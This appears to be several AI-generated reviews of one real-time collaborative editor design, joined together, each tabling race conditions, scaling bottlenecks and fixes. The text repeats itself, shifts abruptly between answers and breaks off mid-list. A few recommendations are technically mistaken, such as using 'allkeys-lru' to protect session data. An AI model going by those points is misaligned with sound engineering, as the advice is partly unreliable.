Below is a systematic review of the described real‑time collaborative editor.
For each problem I list:
| Issue | Impact | Fix | Trade‑offs |
|---|---|---|---|
| Clock drift – client timestamps are used for LWW. | Two users editing the same paragraph can produce nondeterministic ordering; the “last” edit may not reflect real intent. | • Use server‑generated logical timestamps (e.g., Lamport clocks or a monotonically increasing counter per document). <br>• Store the server‑generated timestamp in the change payload. | Requires a tiny round‑trip (or embed the timestamp in the WebSocket message) but eliminates reliance on client clocks. |
| LocalStorage token persistence – vulnerable to XSS and can be cleared by the user. | Unexpected logout, loss of session state, possible replay attacks. | • Move JWT to an HttpOnly secure cookie (same‑site). <br>• Refresh token flow (short‑lived access token + long‑lived refresh token). | Adds an extra token and refresh endpoint, but improves security and resilience to token loss. |
| WebSocket reconnection handling – not described. | Users may lose the connection and see stale data or duplicate edits. | • Implement exponential back‑off reconnection with state sync on reconnect (e.g., request the latest document snapshot). | Slightly more client code, but essential for reliability. |
| Issue | Impact | Fix | Trade‑offs |
|---|---|---|---|
| Single‑point WebSocket “owner” per server – each server only broadcasts to its own connections. | Changes made on one server are not instantly visible to clients on other servers. | • Use a publish‑subscribe system (Redis Pub/Sub, NATS, or Kafka) to fan‑out changes across all servers. <br>• On change receipt, publish to a channel; all servers subscribe and push to their local sockets. | Adds a small latency (publish‑subscribe round‑trip) but removes the need for polling. |
| Polling PostgreSQL every 2 s – inefficient and noisy. | High read load on the primary (or a replica), increased latency for cross‑server sync, potential missed changes if a change occurs just after a poll. | • Replace polling with a change‑data‑capture (CDC) mechanism (e.g., PostgreSQL logical replication, Debezium). <br>• Or use a lightweight “last‑updated” timestamp column and a LISTEN/NOTIFY on change. | Requires extra infrastructure (CDC pipeline) or a small DB change, but eliminates polling overhead and guarantees immediate propagation. |
| Last‑write‑wins (LWW) with timestamps – naïve conflict resolution. | Simultaneous edits to the same paragraph can overwrite each other, losing user intent. | • Adopt Operational Transformation (OT) or Conflict‑free Replicated Data Types (CRDTs) for the document model. <br>• If full OT/CRDT is too heavy, use a hybrid: LWW for non‑conflicting regions, and a “merge‑by‑paragraph” algorithm that preserves both edits (e.g., split the paragraph). | OT/CRDT adds complexity and overhead per edit; a hybrid approach is easier to implement but still requires careful design. |
| Document snapshot every 30 s – large writes. | Frequent full‑HTML writes can cause write amplification and slow down the DB. | • Store incremental deltas (diffs) instead of full snapshots. <br>• Keep a background job that composes deltas into a full snapshot every N minutes. | Adds delta‑storage logic but reduces write volume. |
| JWT verification on every request – stateless but may be heavy under load. | CPU overhead per request, especially if RSA verification is used. | • For RSA/ECDSA tokens, cache the public key; or switch to a fast symmetric algorithm (HS256) with a short TTL. <br>• Or use token introspection with Redis to avoid full verification on each request. | Symmetric keys are faster but must be shared across services and are riskier if compromised; introspection adds a Redis lookup. |
| Static assets cached by CloudFront for 5 min – may serve stale data after a deployment. | Users may see old JS/CSS after a bug fix. | • Use versioned URLs (e.g., app.v1.2.3.js) or set Cache-Control: max-age=0, must-revalidate for critical assets. | Versioned URLs increase storage but guarantee freshness. |
| Issue | Impact | Fix | Trade‑offs |
|---|---|---|---|
| Single write node for all changes – no sharding. | Write bottleneck as the number of concurrent edits grows; potential lock contention on the same document row. | • Partition documents by organization ID (as planned) and use a sharded Postgres cluster or a document‑oriented store (e.g., CockroachDB) that scales horizontally. <br>• Use row‑level locking only when necessary; otherwise rely on optimistic concurrency (version column). | Sharding adds operational complexity; CockroachDB introduces a different query model. |
| Read replicas for read‑heavy ops – not used for change propagation. | Polling still hits the primary; read replicas are underutilized. | • Route all read‑only queries (e.g., fetching the latest snapshot) to replicas. <br>• Ensure replicas are up‑to‑date for CDC or LISTEN/NOTIFY. | Replicas may lag slightly; need to monitor replication lag. |
| Storing full HTML snapshots – large blobs. | Increased storage cost, slower backup, harder to diff. | • Store as plain text with compression (e.g., GZIP) or use a binary format (e.g., Protobuf) for deltas. | Compression adds CPU overhead; binary format may require extra tooling. |
| No explicit durability guarantee for edits – writes may be lost if server crashes before DB commit. | Users may lose recent changes. | • Use a write‑ahead log (WAL) and ensure synchronous_commit = on for critical tables. <br>• Or buffer edits in Redis with a short TTL and replay on crash. | synchronous_commit can slow writes; Redis buffering adds complexity. |
| Issue | Impact | Fix | Trade‑offs |
|---|---|---|---|
| Session cache only – no use for change propagation. | No benefit from Redis’s pub/sub capabilities. | • Use Redis Pub/Sub (or Streams) for cross‑server change broadcast, as mentioned above. | Requires Redis to be highly available (clustered). |
| Potential data loss on Redis eviction – default LRU may evict session data. | Users get logged out unexpectedly. | • Set a higher maxmemory-policy (e.g., allkeys-lru) and increase memory, or use Redis persistence (RDB/AOF) for critical sessions. | More memory cost; persistence adds write overhead. |
| No rate‑limiting – clients could flood the server with change events. | Server overload, increased latency. | • Implement per‑client rate limiting in the API layer (e.g., token bucket) or use a CDN edge rule. | Adds a small check per request; may need to tune thresholds. |
| Issue | Impact | Fix | Trade‑offs |
|---|---|---|---|
| Round‑robin routing – does not respect session affinity. | A client may reconnect to a different server after a temporary loss, causing duplicate change handling or missed updates. | • Use sticky sessions (session cookie) or a consistent hashing scheme based on document ID. | Sticky sessions can reduce pool utilization; consistent hashing requires a custom load‑balancer or service mesh. |
| No health‑check for WebSocket connections – dead servers may still receive client traffic. | Clients may experience dropped connections and need reconnection logic. | • Enable WebSocket‑aware health checks (e.g., ping/pong) and remove unhealthy nodes from rotation. | Slightly more configuration but improves reliability. |
| Scaling of WebSocket memory – each server holds all its connections. | Memory pressure when many users connect to a single server. | • Distribute connections evenly (via sticky routing) and consider a dedicated WebSocket gateway (e.g., NGINX + uWSGI) that can scale independently. | Adds an extra service layer. |
| Issue | Impact | Fix | Trade‑offs |
|---|---|---|---|
| Last‑write‑wins – no context of edit intent. | Users may lose meaningful changes, especially in collaborative editing. | • Implement OT/CRDT for fine‑grained merge. <br>• If full OT/CRDT is too heavy, adopt a “paragraph‑level merge” that splits the paragraph and preserves both edits. | OT/CRDT requires a more complex client library; paragraph merge is simpler but may still conflict on overlapping edits. |
| Timestamp collisions – two edits with identical timestamps (e.g., same millisecond). | Deterministic ordering not guaranteed. | • Append a server‑generated unique sequence number to the timestamp. | Slightly more data per edit. |
| No versioning – changes can be applied out of order. | Inconsistent document state across clients. | • Include a monotonically increasing document version in each change; servers reject out‑of‑order changes. | Requires client to fetch the latest version before editing, adding latency. |
| Issue | Impact | Fix | Trade‑offs |
|---|---|---|---|
| JWT stored in localStorage – vulnerable to XSS. | Token theft, session hijacking. | • Move to HttpOnly secure cookie (as above). | Adds CSRF protection considerations (e.g., double‑submit cookie). |
| No per‑document permission checks – any authenticated user can edit any document. | Data leakage. | • Store ACLs in the DB and verify on each change request. | Slightly more DB reads per edit. |
| No rate limiting on API – potential abuse. | Server overload, denial‑of‑service. | • Implement global and per‑document rate limits (e.g., using Redis counters). | Adds a Redis dependency. |
| Issue | Impact | Fix | Trade‑offs |
|---|---|---|---|
| No metrics on change propagation latency – cannot detect slow servers. | Hidden performance regressions. | • Instrument WebSocket send/receive timestamps and publish to a monitoring system (Prometheus). | Extra code, but essential for SLA. |
| No tracing of cross‑server broadcasts – hard to debug missed updates. | Users see stale content. | • Add distributed tracing (e.g., OpenTelemetry) around publish/subscribe and DB writes. | Adds overhead and requires a tracing backend. |
| No alerting on replication lag – CDC may fall behind. | Clients may see outdated snapshots. | • Monitor pg_stat_replication lag and set alerts. | Requires monitoring stack. |
| Layer | Primary Change | Key Benefit |
|---|---|---|
| Client | Server‑generated timestamps, HttpOnly cookie, reconnection sync | Removes clock drift, improves security, ensures state consistency |
| WebSocket Broadcast | Use Redis Pub/Sub or NATS instead of polling | Real‑time cross‑server propagation, eliminates 2‑second polling latency |
| Conflict Resolution | Adopt OT/CRDT or hybrid paragraph merge | Guarantees intent preservation, reduces lost edits |
| Data Storage | Store incremental deltas + periodic full snapshots | Reduces write volume, improves backup efficiency |
| Database | Partition by org, use CDC or LISTEN/NOTIFY, enable synchronous_commit for critical edits | Scales writes, ensures durability, removes polling |
| Load Balancing | Sticky sessions or consistent hashing, WebSocket‑aware health checks | Keeps client on same server, prevents dead connections |
| Security | HttpOnly cookie, per‑document ACLs, rate limiting | Mitigates XSS, data leakage, abuse |
| Observability | Metrics, tracing, replication lag alerts | Enables rapid detection of performance or consistency issues |
| Enhancement | Cost / Complexity & New Failure Modes | Mitigation |
|---|---|---|
| Redis Pub/Sub | Requires a Redis cluster; messages can be lost if a server crashes. | Use at‑least‑once delivery and deduplication logic on the client. |
| OT/CRDT | Significant client & server library effort; higher per‑edit CPU. | Start with a simple OT implementation for text only; fall back to LWW for non‑conflicting ops. |
| Delta storage | Needs diffing logic and more complex snapshot assembly. | Cache recent deltas in memory for quick reconstruction; validate snapshots periodically. |
| Sticky sessions | Can lead to uneven load distribution. | Combine with session‑id hashing that balances across nodes. |
| HttpOnly cookie | Requires CSRF protection (e.g., double‑submit cookie). | Add CSRF token verification on state‑changing endpoints. |
Implementing the above changes will transform the system from a polling‑heavy, clock‑driven, LWW‑only design into a robust, low‑latency, conflict‑aware collaborative editor that scales horizontally without sacrificing consistency or security.
Below is a structured “failure‑mode → mitigation” map for the architecture you described.
For each problem I note the symptom / risk, the root cause, a concrete remediation, and the key trade‑offs you’ll have to weigh when you implement it.
| # | Failure / Race Condition | Why it happens | Concrete solution | Trade‑offs |
|---|---|---|---|---|
| 1.1 | Lost updates when a server crashes – a client’s WebSocket is attached to a single API instance; if that instance dies the change never reaches other clients. | No central fan‑out; each server only knows about its own connections. | • Introduce a message broker (Kafka, NATS, or Redis Pub/Sub) that all API nodes publish changes to. <br>• Each server subscribes to the broker and pushes to all its local sockets. | Broker adds latency (few ms) and operational overhead, but guarantees at‑least‑once delivery and decouples scaling of WS workers from the DB. |
| 1.2 | Sticky‑session requirement – load‑balancer round‑robin can route a client’s subsequent WS frames to a different server, breaking the “only broadcast to own sockets” rule. | WS connections are stateful; a client can have only one active socket. | • Use session affinity (sticky‑sessions) on the LB or <br>• Deploy a WebSocket gateway (e.g., Envoy, NGINX, or a dedicated socket‑server) that terminates WS and forwards events to the broker. | Sticky‑sessions limit true horizontal scaling of WS workers; a gateway adds a hop but lets you scale workers independently. |
| 1.3 | Back‑pressure / overload – a burst of edits (e.g., paste of a large block) floods the broker and downstream sockets, causing queue buildup and eventual OOM. | No flow‑control; WS frames are fire‑and‑forget. | • Rate‑limit at the client (debounce typing, max N ops / sec). <br>• Batch changes on the server (e.g., 10 ms windows) before publishing. <br>• Enable broker back‑pressure (Kafka’s consumer lag metrics) and drop or throttle when lag exceeds a threshold. | Slight increase in latency (few tens of ms) but protects stability. |
| 1.4 | Network partition / intermittent connectivity – a client temporarily loses WS, reconnects to a different server, and misses intermediate ops. | No replay mechanism; server only pushes live updates. | • Store ops in a log (Kafka topic or Redis stream) with a monotonically increasing sequence number. <br>• On reconnect, the client asks for “ops after seq X”. | Requires client‑side sequence tracking and log retention; extra storage cost. |
| 1.5 | Duplicate delivery – if a server publishes to the broker and also re‑broadcasts locally, a client connected to the same server may receive the same op twice. | Lack of idempotency handling. | • Include a unique op‑ID (UUID + server‑id) and have the client dedupe. <br>• Or let the broker be the only broadcast path (remove local broadcast). | Slight client complexity; eliminates double‑send risk. |
**2. Data layer (PostgreSQL & sync)**

| # | Failure / Race Condition | Why it happens | Concrete solution | Trade‑offs |
|---|---|---|---|---|
| 2.1 | Write‑write conflict & last‑write‑wins (LWW) is unreliable – client clocks drift, leading to “future” timestamps that overwrite newer edits. | No authoritative time source. | • Use server‑side timestamps (e.g., NOW() in Postgres) instead of client‑provided ones. <br>• Or keep client‑provided timestamps but validate they are within a sane bound (e.g., ±5 s). | Server timestamps guarantee total order, but you lose the ability to resolve ties based on client intent (e.g., “my edit happened earlier”). |
| 2.2 | Polling lag – other servers poll every 2 s, causing up to 2 s of stale view and increasing conflict probability. | Polling is coarse and adds DB load. | • Replace polling with change‑data‑capture (CDC) (Postgres logical replication) that streams changes to the broker. <br>• Or use LISTEN/NOTIFY + a lightweight pub/sub to push updates instantly. | CDC requires extra infrastructure (Debezium, Kafka Connect); LISTEN/NOTIFY has limited payload size and can be overwhelmed at high QPS. |
| 2.3 | Snapshot loss – full HTML snapshots every 30 s means any crash between snapshots loses up to 30 s of work. | No incremental persistence. | • Persist incremental ops (the same stream used for real‑time) to durable storage (Kafka, S3). <br>• Periodically compact into a new snapshot (e.g., every minute). | More storage I/O but near‑zero data loss; compaction adds CPU overhead. |
| 2.4 | Read‑replica lag – heavy read traffic (e.g., document load) can cause replicas to lag behind the primary, showing stale data after a write. | Replication is asynchronous. | • Serve writes (including the latest state) from the primary only; route read‑only heavy ops (history, analytics) to replicas. <br>• Use synchronous replication for critical tables (costly). | Synchronous replication hurts write latency; routing logic adds complexity. |
| 2.5 | Hot‑spot partitions – documents are partitioned by organization ID, but a large org can generate a disproportionate load on a single DB shard. | Uneven distribution of active docs. | • Add sharding on document ID (hash) in addition to org ID, or use Citus (Postgres distributed) to auto‑balance. | Requires schema changes and a distributed query layer. |
| 2.6 | Deadlocks / transaction contention – many concurrent edits on the same row (document) cause lock contention. | Each edit writes a new row or updates a large JSON column. | • Use an append‑only table for ops (no UPDATE). <br>• Or store the document in a document‑store (e.g., MongoDB) that handles concurrent writes better. | Append‑only table grows quickly; needs periodic compaction. |
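Rows 2.1 and 2.6 combine into one small pattern: an append-only op log with server-assigned sequence numbers, where an op based on a stale version is rejected for rebasing instead of silently winning on a client clock. A hedged sketch (names are illustrative, not a real schema):

```javascript
// Server-authoritative versioning in place of client timestamps.
class DocState {
  constructor() { this.ops = []; this.seq = 0; }  // append-only op log

  apply(op) {
    if (op.baseSeq !== this.seq) {
      // Stale base version: the client must fetch newer ops and rebase.
      return { ok: false, currentSeq: this.seq };
    }
    this.seq += 1;
    this.ops.push({ ...op, seq: this.seq, serverTs: Date.now() });
    return { ok: true, seq: this.seq };
  }
}

const doc = new DocState();
const r1 = doc.apply({ baseSeq: 0, text: "A" });   // accepted, becomes seq 1
const r2 = doc.apply({ baseSeq: 0, text: "B" });   // concurrent edit: rejected
const r3 = doc.apply({ baseSeq: 1, text: "B'" });  // rebased: accepted, seq 2
```

Because rows are only ever inserted, there is no UPDATE contention on a shared document row; the cost is the compaction job noted in the trade-off column.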
**3. Caching layer (Redis)**

| # | Failure / Race Condition | Why it happens | Concrete solution | Trade‑offs |
|---|---|---|---|---|
| 3.1 | Cache stampede on document load – many clients request the same doc after a snapshot, all hit the DB simultaneously. | No request coalescing. | • Use single‑flight / request coalescing (e.g., SETNX lock) so only one DB fetch occurs; others wait for the cached result. | Slight latency for waiting clients; extra lock handling. |
| 3.2 | Redis node failure – session cache lost, causing auth look‑ups to fall back to DB and increasing latency. | No redundancy. | • Deploy Redis replication with Sentinel for automatic failover, or Redis Cluster for sharding with built‑in failover. | Higher memory cost; Cluster adds key‑slot migration handling, Sentinel adds failover configuration. |
| 3.3 | Stale session data – JWT stored in localStorage, but Redis is used for revocation; if Redis is out‑of‑sync, revoked tokens may still be accepted. | No real‑time sync between client and Redis. | • Use short‑lived JWTs (e.g., 15 min) + refresh tokens stored in Redis. <br>• Or keep JWTs stateless and rely on token introspection only when a revocation flag is set. | Shorter JWT lifespan increases refresh traffic; adds complexity to token flow. |
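The single-flight coalescing from row 3.1 is short enough to show directly. A sketch under assumed names, using a shared in-flight promise per document instead of a real Redis `SETNX` lock:

```javascript
const inflight = new Map();   // docId -> shared in-flight Promise
let dbFetches = 0;            // instrumentation for this example only

async function fetchFromDb(docId) {
  dbFetches += 1;                    // counts real database hits
  return `contents of ${docId}`;     // stand-in for an actual query
}

function loadDoc(docId) {
  if (inflight.has(docId)) return inflight.get(docId);  // join existing fetch
  const p = fetchFromDb(docId).finally(() => inflight.delete(docId));
  inflight.set(docId, p);
  return p;
}

// Ten concurrent requests for the same doc share a single DB fetch.
const done = Promise.all(
  Array.from({ length: 10 }, () => loadDoc("doc-42"))
);
```

The waiting callers pay only the latency of the one shared fetch, which is the "slight latency for waiting clients" trade-off in the table.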
**4. Authentication & sessions**

| # | Failure / Race Condition | Why it happens | Concrete solution | Trade‑offs |
|---|---|---|---|---|
| 4.1 | JWT replay after logout – token lives 24 h; if a user logs out on one device, the token remains valid elsewhere. | No revocation list. | • Store a token version or session ID in Redis; on logout increment version, forcing clients to fetch a new token. <br>• Or reduce JWT TTL to 1 h and use refresh tokens. | More frequent token refresh; extra Redis reads on each request. |
| 4.2 | XSS stealing of JWT from localStorage – localStorage is accessible to any script on the page. | Insecure storage. | • Move token to httpOnly Secure SameSite cookies. <br>• Or keep in IndexedDB with CSP + Subresource Integrity. | Cookies are sent automatically on every request (including static assets) unless scoped; need careful SameSite handling. |
| 4.3 | Clock skew in token issuance – client clock used for “exp” validation can be wrong, causing premature rejection. | Client‑side time check. | • Validate exp on the server only; client should ignore it for UI decisions. | Slight UX impact (user may see “session expired” after a few minutes). |
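The token-version scheme from row 4.1 can be sketched with a plain map standing in for Redis (all names illustrative; real code would carry the version as a signed JWT claim):

```javascript
const tokenVersions = new Map();   // stand-in for Redis: userId -> version

function issueToken(userId) {
  const ver = tokenVersions.get(userId) ?? 1;
  tokenVersions.set(userId, ver);
  return { userId, ver };          // in practice: sign { sub, ver } as a JWT
}

function isValid(token) {
  // One Redis read per request: reject tokens from before the last logout.
  return token.ver === tokenVersions.get(token.userId);
}

function logoutEverywhere(userId) {
  // Bumping the version invalidates every previously issued token at once.
  tokenVersions.set(userId, (tokenVersions.get(userId) ?? 1) + 1);
}

const t = issueToken("alice");
const validBefore = isValid(t);    // token matches current version
logoutEverywhere("alice");
const validAfter = isValid(t);     // stale version: rejected
```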
**5. CDN layer**

| # | Failure / Race Condition | Why it happens | Concrete solution | Trade‑offs |
|---|---|---|---|---|
| 5.1 | Stale API responses – CloudFront caches API GETs for 5 min, so a client may read an outdated document snapshot after an edit. | Cache TTL too aggressive for mutable data. | • Set Cache‑Control: no‑store or max‑age=0 for document‑fetch endpoints. <br>• Or use Cache‑Tag invalidation on each edit (purge specific doc). | More origin traffic; invalidation adds latency but guarantees freshness. |
| 5.2 | Cache warm‑up latency – after a new document is created, the first read triggers a cache miss and a DB hit, causing a spike. | No pre‑warming. | • Proactively populate CDN (or edge cache) after snapshot creation via a background job. | Extra write‑through cost; minimal impact if done asynchronously. |
**6. Load balancing & operations**

| # | Failure / Race Condition | Why it happens | Concrete solution | Trade‑offs |
|---|---|---|---|---|
| 6.1 | Unbalanced load – round‑robin without health checks can send traffic to a crashed instance, causing connection failures. | LB not aware of instance health. | • Enable health‑check endpoints (e.g., /healthz) and configure LB to skip unhealthy nodes. | Slightly longer health‑check interval may delay detection. |
| 6.2 | Graceful shutdown – when a server is terminated (e.g., autoscaling), existing WS connections are dropped abruptly. | No draining. | • Implement connection draining: stop accepting new WS, broadcast a “reconnect” message, wait for existing sockets to close, then exit. | Slightly longer termination time; need orchestrator support (K8s pod termination hooks). |
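The draining sequence from row 6.2 reduces to a small state machine. A sketch with assumed names (a real deployment would trigger `startDrain` from SIGTERM or a K8s preStop hook):

```javascript
class WsServer {
  constructor() { this.sockets = new Set(); this.draining = false; }

  accept(socket) {
    if (this.draining) return false;   // LB should stop routing here
    this.sockets.add(socket);
    return true;
  }

  startDrain() {
    this.draining = true;
    // Ask existing clients to reconnect elsewhere before we exit.
    for (const s of this.sockets) s.send({ type: "reconnect" });
  }

  close(socket) { this.sockets.delete(socket); }

  readyToExit() { return this.draining && this.sockets.size === 0; }
}

const server = new WsServer();
const msgs = [];
const sock = { send: (m) => msgs.push(m) };
server.accept(sock);
server.startDrain();
const rejected = server.accept({ send: () => {} });  // refused while draining
server.close(sock);   // client has reconnected to another node
```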
**Scaling bottlenecks summary**

| Bottleneck | Symptoms | Remedy | Trade‑offs |
|---|---|---|---|
| WebSocket fan‑out | Each server only knows its own sockets → limited to per‑node client count. | Central broker (Kafka/NATS) + pub/sub; or a dedicated WS gateway. | Adds a network hop and operational component, but enables true horizontal scaling of API nodes. |
| DB write throughput | All edits go to a single PostgreSQL primary → CPU/IO saturation. | Append‑only ops table + partitioning (by org + hash) or move to a distributed SQL (Citus, CockroachDB). | More complex schema; need compaction jobs. |
| Polling latency | 2 s poll → stale view, higher conflict rate. | CDC / LISTEN‑NOTIFY to push changes instantly. | CDC adds extra services; LISTEN‑NOTIFY limited payload size. |
| Snapshot frequency | 30 s snapshots → potential loss of up to 30 s of work. | Persist incremental ops to durable log; compact into snapshots periodically. | Extra storage I/O; compaction CPU cost. |
| Redis single point | One Redis node → cache miss + session loss on failure. | Redis replication with Sentinel failover, or Redis Cluster. | Higher memory cost; need to handle key‑slot migrations. |
| JWT long TTL | Revocation impossible, XSS risk. | Shorter JWT + refresh token; store revocation list in Redis. | More token refresh traffic; extra Redis reads. |
| CDN stale API | 5 min cache TTL → stale document reads. | Cache‑Control: no‑store for mutable endpoints; edge invalidation on edit. | More origin load; but guarantees freshness. |
| Load‑balancer routing | Round‑robin without affinity breaks WS continuity. | Sticky sessions or WS gateway that terminates connections. | Sticky sessions limit true stateless scaling; gateway adds a hop. |
If you need to ship a more robust version quickly, focus on the high‑impact, low‑complexity changes first:
1. **Server‑side ordering** – switch conflict resolution to `NOW()` and store a monotonic sequence number.
2. **Redis Pub/Sub** – publish every op to a channel `doc:{id}`. Replace the per‑node broadcast with a subscription to that channel.
3. **Instant propagation** – use `LISTEN/NOTIFY` on the ops table and have each API node push the notification to the broker, eliminating the 2 s poll.
4. **Fresh reads** – set `Cache‑Control: no‑store` on all document‑fetch endpoints; invalidate CDN on every edit (CloudFront invalidation API).
5. **Health & draining** – expose `/healthz` and configure LB draining.

These steps give you real‑time consistency, no stale reads, and basic fault tolerance while keeping the architecture simple.
**Longer‑term enhancements**

| Enhancement | What it solves | Rough effort |
|---|---|---|
| CRDT / Operational Transformation (OT) | Eliminates LWW conflicts, enables true concurrent editing without a central arbiter. | High – requires a new data model, client library, and server‑side merging. |
| Event‑sourced document store (Kafka + compacted topic) | Guarantees lossless edit history, fast replay for new nodes, and easy snapshotting. | Medium – need to build consumer pipelines and compaction logic. |
| Distributed SQL (Citus / CockroachDB) | Scales writes horizontally, removes hot‑spot partitions. | Medium – data migration and query‑rewriting. |
| WebSocket gateway (Envoy/Traefik) | Decouples WS scaling from API logic, removes sticky‑session requirement. | Low‑Medium – configuration only, but requires a new service. |
| Token introspection service | Central revocation, short‑lived JWTs, per‑device logout. | Low – small microservice + Redis. |
| Edge‑computing (Cloudflare Workers) | Move diff‑generation to edge, reduce origin load. | Medium – custom JavaScript/TypeScript on edge. |
Implement the low‑effort fixes first, then progressively adopt the higher‑complexity, higher‑value solutions (CRDT/OT, event‑sourcing, distributed SQL) as the product scales.
Issue: Last-write-wins with client timestamps is fundamentally flawed
Solution: Implement operational transformation (OT) or Conflict-Free Replicated Data Types (CRDTs)
Issue: Each server only broadcasts to its own clients
Solution: Implement a pub/sub layer (Redis Pub/Sub or Kafka)
Client → Server → Pub/Sub Channel → All Servers → All Clients
Issue: Server crash or network partition loses up to 30 seconds of work
Solution: Write-ahead log (WAL) + more frequent incremental saves
Issue: JWT in localStorage vulnerable to XSS attacks
Solution: Store tokens in httpOnly, Secure, SameSite cookies with CSRF protection instead of localStorage, and shorten the expiry with refresh tokens
Issue: All writes go to single PostgreSQL primary
Solution: Add read replicas for reads, batch edits into an append-only operations log, and shard writes (e.g., with Citus) as volume grows
Issue: CloudFront caching API responses for 5 minutes
Solution: Disable caching for document endpoints (`Cache-Control: no-store`) and invalidate the CDN on edits; cache only static assets
Issue: Server crash disconnects all its clients
Solution: Client auto-reconnect with backoff, plus sequence-numbered operations so a reconnecting client can request every change it missed
Issue: Document partitioning by organization ID creates hotspots
Solution: Shard by a hash of document ID (optionally combined with organization ID) so large organizations spread across shards
Issue: No strategy for network partitions (CAP theorem)
Solution: Favor availability with eventual consistency: accept edits into a local operation log during a partition and reconcile deterministically (server sequencing or CRDT merge) once it heals
Issue: No mention of metrics, logging, or tracing
Solution: Add structured logging, metrics (e.g., Prometheus), and distributed tracing (e.g., OpenTelemetry) across the WebSocket and HTTP paths
| Solution | Complexity | Performance | Consistency | Cost |
|---|---|---|---|---|
| OT/CRDT | High | Medium | Strong | Medium |
| Pub/Sub | Medium | Good | Eventual | Low |
| CQRS | High | Excellent | Eventual | High |
| CDC | Medium | Excellent | Eventual | Medium |
| Edge Computing | Very High | Excellent | Varies | Very High |
The architecture has good foundational concepts but requires significant enhancements for production readiness, particularly around consistency, durability, and real-time propagation. The most critical fix is moving away from last-write-wins conflict resolution, as this will fundamentally undermine user trust in the collaborative experience.
Set `Cache-Control: no-store` headers on dynamic API responses. Cache only static assets (e.g., CSS, JS).

| Issue Category | Solution | Trade-off |
|---|---|---|
| WebSocket Drop | Auto-reconnect + Redis Pub/Sub | Latency & Redis dependency |
| Database Failure | Replicas + WAL buffering | Complexity & buffering risk |
| Conflict Resolution | OT/CRDTs + Server sequencing | Implementation complexity |
| PostgreSQL Bottleneck | Sharding + Read replicas + S3 snapshots | Data retrieval complexity |
| WebSocket Limits | Dedicated WebSocket service | Cost & operational overhead |
| Stale CDN Caching | no-store for dynamic data | Increased API server load |
| JWT Security | HTTP-only cookies + short expiry | CORS complexity & refresh overhead |
| Snapshot Storage | Deltas + Versioned S3 storage | Merge logic complexity |
By addressing these issues, the system can achieve robust real-time collaboration while scaling to thousands of concurrent users.
Let's analyze this architecture systematically:
1. Timestamp-based Conflict Resolution Issues
Problem: Using client clocks creates potential race conditions due to clock drift and network latency variability. If two users edit the same content near simultaneously but clocks aren't synchronized, the actual last edit might not win.
Solution: Implement logical timestamps (Lamport clocks) or a TrueTime-style service (as in Google Spanner). The client sends an opId; the server assigns an incrementing sequence number, yielding a serverOpId that enforces causality.
Trade-offs: Higher complexity, requires versioning database records
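A Lamport clock, as suggested above, is only a few lines: a logical counter that produces a causality-respecting order without trusting any wall clock. A minimal sketch:

```javascript
class LamportClock {
  constructor() { this.time = 0; }

  // Local event (e.g., a user edit): advance and stamp.
  tick() { return ++this.time; }

  // On receiving a remote op, jump past its timestamp so our next
  // event is ordered after everything we have already observed.
  receive(remoteTime) {
    this.time = Math.max(this.time, remoteTime) + 1;
    return this.time;
  }
}

const a = new LamportClock();
const b = new LamportClock();

const t1 = a.tick();       // A edits
const t2 = b.receive(t1);  // B observes A's edit
const t3 = b.tick();       // B edits, causally after A's
const t4 = a.receive(t3);  // A observes B's edit
```

Ties between genuinely concurrent ops still need a deterministic tiebreak (e.g., site ID), but clock drift can no longer reorder causally related edits.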
2. WebSocket Connection Management
Problem: Sticky sessions needed for WebSocket clients (same client must connect to same server). Users could lose connection during server scaling events.
Solution: Implement Pub/Sub pattern with Redis. All servers subscribe to changes, allowing any server to broadcast updates to clients.
Trade-offs: Higher infrastructure cost, adds latency for initial broadcast
3. Full Snapshot Save Bottleneck
Problem: Saving full HTML snapshots every 30 seconds under high edit frequency creates database contention.
Solution: Implement delta updates - store diffs between versions, only snapshot on major changes. Store deltas with expiry based on version frequency.
Trade-offs: Need periodic compaction of deltas to snapshots
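The delta-plus-compaction idea above can be sketched as follows. The "delta" is simplified to an append (real deltas would be positional diffs), and the compaction threshold is an assumed example value:

```javascript
const COMPACT_AFTER = 3;   // assumed threshold for this example

class DocStore {
  constructor(snapshot = "") { this.snapshot = snapshot; this.deltas = []; }

  // Record only what changed; fold deltas into a new snapshot once
  // enough accumulate, instead of snapshotting on a fixed timer.
  applyDelta(text) {
    this.deltas.push(text);
    if (this.deltas.length >= COMPACT_AFTER) this.compact();
  }

  compact() {
    this.snapshot += this.deltas.join("");
    this.deltas = [];
  }

  // Current state = last snapshot + pending deltas.
  current() { return this.snapshot + this.deltas.join(""); }
}

const store = new DocStore("Hello");
store.applyDelta(" ");
store.applyDelta("World");
const pendingBeforeCompact = store.deltas.length;  // 2 deltas still pending
store.applyDelta("!");                             // hits threshold: compacts
```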
4. Session Cache Inconsistency
Problem: JWT tokens stored in localStorage are vulnerable to XSS, leading to session hijacking.
Solution: Move JWT to httpOnly cookies with CSRF protection. Revoke tokens server-side using Redis blacklist.
Trade-offs: CORS restrictions, additional CSRF token handling
5. Database Partitioning Issues
Problem: Organization-level partitioning creates hot partitions for large organizations. Write amplification when organizations cross partition boundaries.
Solution: Shard by document ID and maintain cross-shard consistency through distributed transactions. Use eventual consistency with quorum writes.
Trade-offs: Read latency increases, requires transaction coordination overhead
6. CDN Cache Invalidation
Problem: API responses cached for 5 minutes means stale data during active collaboration.
Solution: Implement cache invalidation via WebSocket triggers or the CDN's invalidation API, with adaptive TTLs.
Trade-offs: Increases CDN costs, requires additional tooling
7. PostgreSQL Write Contention
Problem: High-frequency document updates create write bottlenecks in PostgreSQL.
Solution: Implement append-only logs for each document, batch writes, and use replication with read replicas.
Trade-offs: More storage needed, increased complexity for data integrity
8. Document Version Rollback
Problem: Conflicts causing content loss when two clients edit same section.
Solution: Store complete document history with revert functionality, maintain author info. Implement operational transform (OT) or CRDT for true collaborative editing.
Trade-offs: Much higher storage requirements, complex conflict resolution
9. Load Balancer State
Problem: Round-robin LB doesn't consider server load or WebSocket connection count.
Solution: Switch to least-connections algorithm with health checks. Add connection pooling with connection limits per server.
Trade-offs: Higher operational complexity, need to monitor active connections
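The least-connections pick with health checks can be sketched as a pure function (names assumed; a production load balancer implements this natively):

```javascript
// Route each new WebSocket to the healthy server with the fewest
// active connections; return null if nothing healthy remains.
function pickServer(servers) {
  const healthy = servers.filter((s) => s.healthy);
  if (healthy.length === 0) return null;
  return healthy.reduce((a, b) => (b.connections < a.connections ? b : a));
}

const servers = [
  { id: "api-1", connections: 120, healthy: true },
  { id: "api-2", connections: 45,  healthy: true },
  { id: "api-3", connections: 10,  healthy: false },  // failed health check
];

const target = pickServer(servers);  // fewest connections among healthy nodes
```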
10. Recovery Scenario Race Conditions
